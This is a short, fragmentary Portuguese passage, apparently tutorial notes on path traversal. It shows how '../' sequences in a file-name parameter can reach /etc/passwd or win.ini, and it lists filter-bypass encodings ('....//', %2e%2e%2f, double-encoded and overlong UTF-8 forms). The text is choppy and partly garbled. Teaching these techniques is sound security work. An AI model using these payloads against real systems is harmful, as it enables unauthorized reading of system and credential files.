../
) indica que a máquina acessará o diretório pai ao atual, e por ter três (../
), o computador acessará a root, e o que realmente é lido é:../
) quanto (..\
) e ao invés de /etc/passwd
seria \windows\win.ini
../
), então duas coisas podem ser feitas:../
), usar (....//
), pois é equivalente ao anterior e dependendo do filtro, conseguiria passar por ele (Ex: [https://icmc.com.br/loadImage?filename=](https://insecure-website.com/loadImage?filename=../../../etc/passwd)....//....//....//etc/passwd );%2e%2e%2f
representa ../
;%2e%2e/
representa ../
;..%2f
representa ../
;%2e%2e%5c
representa ..\
;%2e%2e\
representa ..\
;..%5c
representa ..\
;%252e%252e%255c
representa ..\
;..%255c
representa ..\
;..%c0%af
representa ../
;..%c1%9c
represents ..\
;